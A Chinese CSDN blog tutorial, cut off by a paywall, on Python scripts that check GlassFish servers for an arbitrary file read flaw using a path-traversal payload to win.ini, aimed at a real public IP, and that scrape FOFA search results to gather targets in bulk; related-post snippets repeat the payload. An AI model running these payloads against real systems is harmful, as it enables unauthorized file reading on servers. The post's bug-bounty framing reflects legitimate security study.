python安全开发——Fofa结果、POC批量提取验证&教育SRC

最新推荐文章于 2024-07-09 16:06:34 发布
最新推荐文章于 2024-07-09 16:06:34 发布
阅读量2.7k 收藏 14
点赞数 1
分类专栏: Python SRC挖掘 文章标签: 安全 python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qi_sjq_/article/details/123059486
版权
本文介绍了使用Python进行安全开发的方法,包括利用Fofa进行目标搜索,提取验证POC,以及批量验证漏洞。通过示例展示了如何编写Python脚本批量收集Fofa搜索结果,对Glassfish任意文件读取漏洞进行验证,并讨论了教育SRC平台的信息提取。文章还提到了异常处理、延时策略和多线程优化。
摘要由CSDN通过智能技术生成

在这里插入图片描述
1.概述:

涉及技术 :Request 爬虫技术,lxml 数据提取,异常护理,Fofa 等使用说明。
目的: 掌握和利用公开或者 0day漏洞进行批量化的收集和验证脚本开发。

在这里插入图片描述

2.某漏洞 POC 验证脚本:

requests库使用参考:https://docs.python-requests.org/en/latest/

首先拿一个简单的例子:验证是否存在 glassfish 任意文件读取漏洞

过程:验证存在 glassfish 的应用是否存在任意文件读取漏洞 :两个 poc,分别对应 linux 和 windows 的。首先fofa关键字(“glassfish” && port=“4848”&&after=“2020-01-01”)搜索可能存在漏洞的网址,记下url,然后编写python脚本发起 get 请求,根据请求的响应状态码来判断是否存在漏洞:

import requests

url='http://186.202.17.69:4848/'
payload_linux='/'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

#data_linux=requests.get(url+payload_linux) #获取请求后的返回源代码
#data_windows=requests.get(url+payload_windows) #获取请求后的返回源代码

data_linux=requests.get(url+payload_linux).status_code #获取请求后的返回状态码
data_windows=requests.get(url+payload_windows).status_code #获取请求后的返回状态码

if data_linux==200 or data_windows==200:
    print("yes")
else:
    print("no")

#print(data_linux.content.decode('utf-8'))
#print(data_windows.content.decode('utf-8'))

原理很简单,就是发起一次http请求,不存在该文件就会返回404状态码。
在这里插入图片描述

3.Fofa搜索结果提取采集漏洞批量验证脚本:

上述只是针对单个目标的验证,那么如何批量提取fofa搜索到的结果、批量发起请求验证该漏洞呢?

首先是如何批量提取搜索结果:可以借助lxml库来提取fofa的结果(也可以正则表达式,没学过爬虫,不知道其他办法…),了解fofa的url搜索规则,对url进行base64处理、页数和条数显示:

#由于fofa最近被整改,修改了域名,而且目前仅限会员使用,无法完全适用了,但思路也可以用到其他搜索引擎上
#本来fofa也有接口可以直接调用查询的,这样写脚本适配url规则及写入cookie反而麻烦了,整改后不知道现在接口还能不能用。
import base64
import requests

search_data='"glassfish" && port="4848"'
url='https://fofa.info/result?&qbase64='
search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
urls=url+search_data_bs
print(urls)

得到的信息筛选出需要的,此时需要使用lxml库:
在这里插入图片描述

soup=etree.tostring(result
最低0.47元/天 解锁文章
暮w光
关注
  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Python安全开发——WEB爬虫库&数据解析库
m0_61506558的博客
02-08 756
这样我们就获取目标地址的html文本,紧接着就要处理返回数据,熟练的师傅可以使用re处理,这里使用入门级的Beautiful,基本语法参考下面文章。如果username=字典,password=字典, 进行批量发送,这不就是一个后台爆破脚本吗?请求方式&POST提交&带入请求头s回显处理&加入代理等。比如说我们需要获得a标签中的上海交通大学,我们尝试使用。再将爬取到的数据保持到本地文本中。这样就获取该class的内容。同样思路固定class值。再获取a标签里面的内容。
使用python实现Api搜索Fofa网络空间资产
Black_Face_Kk的博客
03-26 809
从官网获取个人API和Email这里以city="Hangzhou"为例子,获取100条记录 获取的记录将保存到当前文件运行目录下
Python调用fofa API接口并写入csv文件中
qq_45212655的博客
03-18 1727
给大家介绍一下Python调用fofa的api接口并写入csv文件中的方法。先通过调研发现总体发送的请求是https://fofa.info/api/v1/search/all?&key=your_key&qbase64=dGl0bGU9ImJpbmci,在python中利用requests.get(url=url,params=data)的结构来发送请求,data = req.json()来拿到数据,后面再用csv库来将数据写到文件中。
FOFA网络空间安全搜索引擎的使用
最新发布
weixin_71208450的博客
07-09 1450
FOFA主要针对公网上的资产进行探测,类似于谷歌地图上的建筑物(IP地址),虽然可以看到建筑物的外部结构和规模,但无法了解内部的情况。不同的是,这些数据不仅包括像谷歌或百度一样的网页,还包括像摄像头、打印机、数据库、操作系统等资产。我们可以使用FOFA搜索一些我们想要用的网址,比如最近比较火的ChatGPT,我们可以通过在FOFA上搜索网站标题,找到包含ChatGPT关键词的网站。FOFA是一款网络空间测绘的搜索引擎,旨在帮助用户以搜索的方式查找公网上的互联网资产。进入FOFA的官网,可以查询所有语法。
python小工具之fofa小脚本
win176489的博客
09-06 1363
python小工具之fofa小脚本 记录一个将python列表处理为csv文件的学习过程,并完成一个fofa查询的小工具编写 需要用到的库为如下库 import requests //request库,用来请求数据 import base64 //base64,进行base64编码 import pandas as pd //pandas库,数据处理,此处用来处理csv import csv ...
python爬虫脚本之fofa接口调用
qq_36585338的博客
07-23 681
【代码】python爬虫脚本之fofa接口调用。
基于Python爬取fofa网页端数据过程解析
09-16
主要介绍了基于Python爬取fofa网页端数据过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Python开发-批量Fofa&POC验证
weixin_45357474的博客
03-02 1305
Python开发-批量Fofa&POC验证 学习目的:掌握利用公开或0day漏洞进行批量化的收集及验证脚本开发 首先有一个基本的漏洞是应用服务器glassfish任意文件读取漏洞漏洞标题写的是任意文件读取漏洞,其实该漏洞同样可以列出对应目录文件,基本上等同于源代码泄露,各种敏感信息暴露无遗。 Linux服务器会读取etc/passwd文件的内容 windows服务器会读取windows/win.ini文件的内容 4848端口为glassfish默认开放的web管理端口 首先去fofa搜索一波 “
爬虫python漏洞群_python开发(2)-爬虫批量Fofa-POC验证-SRC提权
weixin_42481553的博客
02-05 344
importrequestsimportbase64from lxml importetreeimporttimeimportsys'''url='http://186.202.17.69:4848/'payload_linux='/'payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%...
POC批量验证Python脚本编写
hackzkaq的博客
05-06 3758
更多黑客技能 公众号:白帽子左一 作者:掌控安全- webdogc 编写目的 批量验证pocPython代码练习。 需求分析 1、poc尽可能简单。 2、多线程。 3、联动fofa获取目标。 4、随机请求头. 实现过程 脚本分为三个模块,获取poc及目标、多线程批量请求验证、输出结果。其中批量请求验证包括构造多线程,修改请求参数,发送请求三个部分。 Main函数 在main函数中,主要有三个部分获取poc及目标,多线程(将目标填充到队列,创建多线程并启动)、输出结果。 具体实现如下: def mai
Python教程:如何用Python编写FOFA爬虫获取信息?
weixin_43263566的博客
05-28 2474
Python教程:如何用Python编写FOFA爬虫获取信息?
网络安全-Python 开发-批量 Fofa&SRC 提取&POC 验证
weixin_65409651的博客
06-20 129
涉及资源: https://fofa.so/ https://src.sjtu.edu.cn/ https://www.secpulse.com/archives/42277.html https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码: xiao。 Python 开发-Fofa 搜索结果提取采集脚本。 Python 开发-某漏洞 POC 验证批量脚本。
Python联合Fofa以及跑子域名
A485860941的博客
04-14 1026
Fofa 是一个可怕的搜索引擎,它不同于谷歌、百度等仅搜索爬取网页信息,Fofa用于。是非常重要的一部分,通常在一个主站进行防护完善的情况下找不到。我们将搜索内容直接存储到本地文件 方便我们下一步渗透测试。,其爬取的是互联网上所有设备的 IP 地址及其端口号.从第一页到第十页 可自行选择页数。点的话,我们可以考虑在。爆破,通过旁站C段进行。必不可少的一个阶段。
【3】python 利用FOFA进行批量爆破
司徒荆的博客
09-03 1827
python 利用FOFA进行批量爆破
p77 Python 开发-批量 Fofa&SRC 提取&POC 验证
weixin_43263566的博客
03-07 1622
Python 开发-批量 Fofa&SRC 提取&POC 验证
Python武器库开发-武器库篇之Fofa-API使用(四十六)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-20 1270
y替换为你的Fofa账号的邮箱和API key。丰富的资产信息:FOFA不仅能够提供目标资产的基本信息,如IP地址、端口等,还可以提供详细的漏洞信息、SSL证书信息、域名信息等,帮助用户全面评估资产的安全性。全面的资产覆盖:FOFA的资产数据库涵盖了全球范围内的互联网资产,包括Web应用程序、IoT设备、数据库、网络设备等,帮助用户全面了解自己的网络资产。可定制的报告功能:FOFA支持生成定制化的资产报告,用户可以根据自己的需求选择生成不同类型的报告,如资产清单、漏洞扫描报告等。库进行参数编码和签名。
python实现fofa调用api批量查询子域
越努力 越自由
08-05 3307
在红蓝对抗的时候,需要频繁的使用fofa进行子域名的查找,如果一个一个域名去查找子域,那效率太低了且耗时,我们可以利用fofa提供的api批量的对一批主域进行子域名的查找!
收集fofa搜索结果的python脚本
08-30
收集 FOFA 搜索结果的 Python 脚本可以使用 FOFA 的开放 API 进行实现。以下是一个简单示例: 首先,你需要在 FOFA 网站上注册并获取 API 密钥。然后,使用下面的 Python 代码作为参考: ```python import requests import json def collect_fofa_results(api_key, query): headers = { 'User-Agent': 'Mozilla/5.0', 'X-Auth-Token': api_key } params = { 'qbase64': query, 'full': 'true', 'fields': 'ip,title' } url = 'https://fofa.so/api/v1/search/all' response = requests.get(url, headers=headers, params=params) if response.status_code == 200: results = json.loads(response.text) return results else: print('Error occurred. HTTP Status Code:', response.status_code) return None api_key = 'your_api_key' query = 'your_query_base64_encoded' results = collect_fofa_results(api_key, query) if results: for result in results['results']: ip = result[0] title = result[1] print('IP:', ip, 'Title:', title) ``` 这段代码中,`collect_fofa_results` 函数发送请求到 FOFA 的 API,其中包含你的 API 密钥和经过 Base64 编码的查询语句。在这个示例中,只收集了结果中的 IP 和标题两个字段。 你需要将 `your_api_key` 改为你在 FOFA 上获取到的 API 密钥,并将 `your_query_base64_encoded` 改为经过 Base64 编码的查询语句。当脚本运行时,它会打印出结果中的 IP 和标题。 这只是一个简单示例,你可以根据自己的需求修改代码并添加更多的字段来收集 FOFA 搜索结果。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值